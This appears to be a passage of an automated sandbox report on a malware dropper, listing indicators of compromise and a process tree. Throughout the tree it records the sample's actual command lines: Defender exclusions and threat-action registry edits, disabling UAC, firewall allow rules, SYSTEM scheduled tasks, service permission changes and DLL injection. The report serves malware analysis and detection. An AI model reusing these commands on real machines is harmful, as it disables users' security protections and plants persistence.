Token: SeLoadDriverPrivilege	4204	WMIC.exe
Token: SeSystemProfilePrivilege	4204	WMIC.exe
Token: SeSystemtimePrivilege	4204	WMIC.exe
Token: SeProfSingleProcessPrivilege	4204	WMIC.exe

Suspicious use of FindShellTrayWindow 14 IoCs

pid	Process
5640	u1lc.1.exe
5640	u1lc.1.exe
5640	u1lc.1.exe
5640	u1lc.1.exe
5640	u1lc.1.exe
5640	u1lc.1.exe
5640	u1lc.1.exe
2536	u468.1.exe
2536	u468.1.exe
2536	u468.1.exe
2536	u468.1.exe
2536	u468.1.exe
2536	u468.1.exe
2536	u468.1.exe

Suspicious use of SendNotifyMessage 14 IoCs

pid	Process
5640	u1lc.1.exe
5640	u1lc.1.exe
5640	u1lc.1.exe
5640	u1lc.1.exe
5640	u1lc.1.exe
5640	u1lc.1.exe
5640	u1lc.1.exe
2536	u468.1.exe
2536	u468.1.exe
2536	u468.1.exe
2536	u468.1.exe
2536	u468.1.exe
2536	u468.1.exe
2536	u468.1.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1580 wrote to memory of 208	1580	cd729dfc0822e7934b558cf3c6e5a1400221ee02d7ebba1eb982b8059dc80976.exe	72
PID 1580 wrote to memory of 208	1580	cd729dfc0822e7934b558cf3c6e5a1400221ee02d7ebba1eb982b8059dc80976.exe	72
PID 1580 wrote to memory of 208	1580	cd729dfc0822e7934b558cf3c6e5a1400221ee02d7ebba1eb982b8059dc80976.exe	72
PID 208 wrote to memory of 4456	208	explorha.exe	73
PID 208 wrote to memory of 4456	208	explorha.exe	73
PID 208 wrote to memory of 4456	208	explorha.exe	73
PID 4456 wrote to memory of 4496	4456	swiiiii.exe	75
PID 4456 wrote to memory of 4496	4456	swiiiii.exe	75
PID 4456 wrote to memory of 4496	4456	swiiiii.exe	75
PID 4456 wrote to memory of 4496	4456	swiiiii.exe	75
PID 4456 wrote to memory of 4496	4456	swiiiii.exe	75
PID 4456 wrote to memory of 4496	4456	swiiiii.exe	75
PID 4456 wrote to memory of 4496	4456	swiiiii.exe	75
PID 4456 wrote to memory of 4496	4456	swiiiii.exe	75
PID 4456 wrote to memory of 4496	4456	swiiiii.exe	75
PID 208 wrote to memory of 1604	208	explorha.exe	78
PID 208 wrote to memory of 1604	208	explorha.exe	78
PID 208 wrote to memory of 1604	208	explorha.exe	78
PID 208 wrote to memory of 1560	208	explorha.exe	79
PID 208 wrote to memory of 1560	208	explorha.exe	79
PID 208 wrote to memory of 1560	208	explorha.exe	79
PID 1560 wrote to memory of 3848	1560	swiiii.exe	81
PID 1560 wrote to memory of 3848	1560	swiiii.exe	81
PID 1560 wrote to memory of 3848	1560	swiiii.exe	81
PID 1560 wrote to memory of 3848	1560	swiiii.exe	81
PID 1560 wrote to memory of 3848	1560	swiiii.exe	81
PID 1560 wrote to memory of 3848	1560	swiiii.exe	81
PID 1560 wrote to memory of 3848	1560	swiiii.exe	81
PID 1560 wrote to memory of 3848	1560	swiiii.exe	81
PID 1560 wrote to memory of 3848	1560	swiiii.exe	81
PID 208 wrote to memory of 2316	208	explorha.exe	83
PID 208 wrote to memory of 2316	208	explorha.exe	83
PID 208 wrote to memory of 1028	208	explorha.exe	86
PID 208 wrote to memory of 1028	208	explorha.exe	86
PID 208 wrote to memory of 1028	208	explorha.exe	86
PID 1028 wrote to memory of 3076	1028	gold.exe	87
PID 1028 wrote to memory of 3076	1028	gold.exe	87
PID 1028 wrote to memory of 3076	1028	gold.exe	87
PID 1028 wrote to memory of 3076	1028	gold.exe	87
PID 1028 wrote to memory of 3076	1028	gold.exe	87
PID 1028 wrote to memory of 3076	1028	gold.exe	87
PID 1028 wrote to memory of 3076	1028	gold.exe	87
PID 1028 wrote to memory of 3076	1028	gold.exe	87
PID 1028 wrote to memory of 3076	1028	gold.exe	87
PID 2316 wrote to memory of 608	2316	file300un.exe	88
PID 2316 wrote to memory of 608	2316	file300un.exe	88
PID 2316 wrote to memory of 3888	2316	file300un.exe	90
PID 2316 wrote to memory of 3888	2316	file300un.exe	90
PID 2316 wrote to memory of 3888	2316	file300un.exe	90
PID 2316 wrote to memory of 3888	2316	file300un.exe	90
PID 2316 wrote to memory of 3888	2316	file300un.exe	90
PID 2316 wrote to memory of 3888	2316	file300un.exe	90
PID 2316 wrote to memory of 3888	2316	file300un.exe	90
PID 2316 wrote to memory of 3888	2316	file300un.exe	90
PID 208 wrote to memory of 4248	208	explorha.exe	131
PID 208 wrote to memory of 4248	208	explorha.exe	131
PID 208 wrote to memory of 4248	208	explorha.exe	131
PID 4248 wrote to memory of 776	4248	rundll32.exe	94
PID 4248 wrote to memory of 776	4248	rundll32.exe	94
PID 776 wrote to memory of 2152	776	rundll32.exe	95
PID 776 wrote to memory of 2152	776	rundll32.exe	95
PID 3888 wrote to memory of 2064	3888	regasm.exe	97
PID 3888 wrote to memory of 2064	3888	regasm.exe	97
PID 3888 wrote to memory of 2064	3888	regasm.exe	97

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\cd729dfc0822e7934b558cf3c6e5a1400221ee02d7ebba1eb982b8059dc80976.exe
"C:\Users\Admin\AppData\Local\Temp\cd729dfc0822e7934b558cf3c6e5a1400221ee02d7ebba1eb982b8059dc80976.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1580
- C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
  "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:208
- - C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe
    "C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:4456
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4496
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4456 -s 836
      4⤵
      Program crash
      PID:4708
- - C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe
    "C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe"
    3⤵
    - Executes dropped EXE
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1604
- - C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe
    "C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:1560
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:3848
- - C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe
    "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"
    3⤵
    - UAC bypass
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - System policy modification
    PID:2316
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:608
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
      4⤵
      Drops startup file
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3888
    - - C:\Users\Admin\Pictures\lXrmYBTzRx1MeZ6q1ZRuprdW.exe
        
        "C:\Users\Admin\Pictures\lXrmYBTzRx1MeZ6q1ZRuprdW.exe"
        5⤵
        Executes dropped EXE
        
        PID:2064
      - C:\Users\Admin\AppData\Local\Temp\u1lc.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u1lc.0.exe"
        6⤵
        Loads dropped DLL
        Checks processor information in registry
        
        PID:96
      - C:\Users\Admin\AppData\Local\Temp\u1lc.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u1lc.1.exe"
        6⤵
        Checks SCSI registry key(s)
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5640
        
        C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        7⤵
        
        PID:4540
    - - C:\Users\Admin\Pictures\GzmpmDfyoCO6lj4EiC4zaiUe.exe
        
        "C:\Users\Admin\Pictures\GzmpmDfyoCO6lj4EiC4zaiUe.exe"
        5⤵
        Executes dropped EXE
        
        PID:5056
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4360
      - C:\Users\Admin\Pictures\GzmpmDfyoCO6lj4EiC4zaiUe.exe
        
        "C:\Users\Admin\Pictures\GzmpmDfyoCO6lj4EiC4zaiUe.exe"
        6⤵
        Windows security bypass
        Windows security modification
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        Modifies data under HKEY_USERS
        
        PID:6100
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:6032
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        7⤵
        
        PID:5704
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        8⤵
        Modifies Windows Firewall
        
        PID:4452
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:4004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:5880
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        7⤵
        Adds Run key to start application
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        
        PID:236
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:2596
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        8⤵
        Creates scheduled task(s)
        
        PID:5156
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        8⤵
        
        PID:5780
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5044
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:2028
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        8⤵
        
        PID:6020
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        8⤵
        Creates scheduled task(s)
        
        PID:2496
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        8⤵
        
        PID:5424
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        9⤵
        
        PID:4756
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        10⤵
        Launches sc.exe
        
        PID:1604
    - - C:\Users\Admin\Pictures\uEAAbQEzg9PcN7EIkFWxWns4.exe
        
        "C:\Users\Admin\Pictures\uEAAbQEzg9PcN7EIkFWxWns4.exe"
        5⤵
        Executes dropped EXE
        
        PID:4436
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5492
      - C:\Users\Admin\Pictures\uEAAbQEzg9PcN7EIkFWxWns4.exe
        
        "C:\Users\Admin\Pictures\uEAAbQEzg9PcN7EIkFWxWns4.exe"
        6⤵
        Windows security bypass
        Windows security modification
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        
        PID:2292
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4784
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        7⤵
        
        PID:4132
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        8⤵
        Modifies Windows Firewall
        
        PID:6060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5044
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:6072
    - - C:\Users\Admin\Pictures\8It8hjPMoumclIlCgjwjVbXd.exe
        
        "C:\Users\Admin\Pictures\8It8hjPMoumclIlCgjwjVbXd.exe"
        5⤵
        Executes dropped EXE
        
        PID:4452
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:404
      - C:\Users\Admin\Pictures\8It8hjPMoumclIlCgjwjVbXd.exe
        
        "C:\Users\Admin\Pictures\8It8hjPMoumclIlCgjwjVbXd.exe"
        6⤵
        Windows security bypass
        Windows security modification
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        
        PID:3400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:1084
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        7⤵
        
        PID:5784
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        8⤵
        Modifies Windows Firewall
        
        PID:3832
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:5864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5532
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:6060
    - - C:\Users\Admin\Pictures\9AtHbSgIGRVSfqxpWWxVr0VR.exe
        
        "C:\Users\Admin\Pictures\9AtHbSgIGRVSfqxpWWxVr0VR.exe"
        5⤵
        Executes dropped EXE
        
        PID:4676
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6096
      - C:\Users\Admin\Pictures\9AtHbSgIGRVSfqxpWWxVr0VR.exe
        
        "C:\Users\Admin\Pictures\9AtHbSgIGRVSfqxpWWxVr0VR.exe"
        6⤵
        Windows security bypass
        Windows security modification
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        
        PID:5300
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:628
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        7⤵
        
        PID:984
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        8⤵
        Modifies Windows Firewall
        
        PID:5712
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5536
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:5224
    - - C:\Users\Admin\Pictures\QVm3NMEvSDXvgsDecjeqkD2d.exe
        
        "C:\Users\Admin\Pictures\QVm3NMEvSDXvgsDecjeqkD2d.exe"
        5⤵
        Modifies firewall policy service
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5772
    - - C:\Users\Admin\Pictures\oBSjUVkTwfKo2SE27ZbSDItd.exe
        
        "C:\Users\Admin\Pictures\oBSjUVkTwfKo2SE27ZbSDItd.exe"
        5⤵
        Executes dropped EXE
        
        PID:1336
      - C:\Users\Admin\AppData\Local\Temp\7zSECD1.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        6⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:5244
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        7⤵
        
        PID:5324
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        8⤵
        
        PID:4236
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        9⤵
        
        PID:2264
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        10⤵
        
        PID:4388
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        8⤵
        
        PID:5508
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        9⤵
        
        PID:4064
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        10⤵
        
        PID:3960
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        8⤵
        
        PID:5184
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        9⤵
        
        PID:5592
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        10⤵
        
        PID:5472
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        8⤵
        
        PID:5692
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        9⤵
        
        PID:5696
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        10⤵
        
        PID:168
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        8⤵
        
        PID:4432
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        9⤵
        
        PID:5768
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5800
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        11⤵
        
        PID:692
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        7⤵
        
        PID:5888
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:6012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5180
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4204
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSECD1.tmp\Install.exe\" it /ZLTdidokfV 385118 /S" /V1 /F
        7⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:1424
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        7⤵
        
        PID:6024
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        8⤵
        
        PID:5648
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        9⤵
        
        PID:748
    - - C:\Users\Admin\Pictures\hUuIIft1fIqJWNIbFOzrYN6r.exe
        
        "C:\Users\Admin\Pictures\hUuIIft1fIqJWNIbFOzrYN6r.exe"
        5⤵
        Executes dropped EXE
        
        PID:3088
      - C:\Users\Admin\AppData\Local\Temp\7zS148D.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        6⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:2052
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        7⤵
        
        PID:5216
        
